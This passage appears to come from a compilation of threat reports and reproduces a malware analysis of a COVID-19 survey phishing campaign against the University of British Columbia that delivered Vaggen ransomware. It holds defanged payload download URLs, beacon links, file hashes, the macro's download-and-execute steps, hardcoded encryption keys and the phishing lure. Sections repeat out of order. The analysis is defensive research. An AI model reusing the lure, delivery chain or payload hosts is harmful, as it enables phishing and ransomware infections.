layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1258 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1259 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1260 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1261 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1262 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1263 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1264 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1265 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1266 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1267 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1268 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1269 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1270 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1271 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1272 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1273 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1274 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1275 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1276 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1277 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1278 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1279 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1280 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1281 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1282 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1283 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1284 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1285 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1286 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1287 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1288 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1289 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1290 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1291 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as 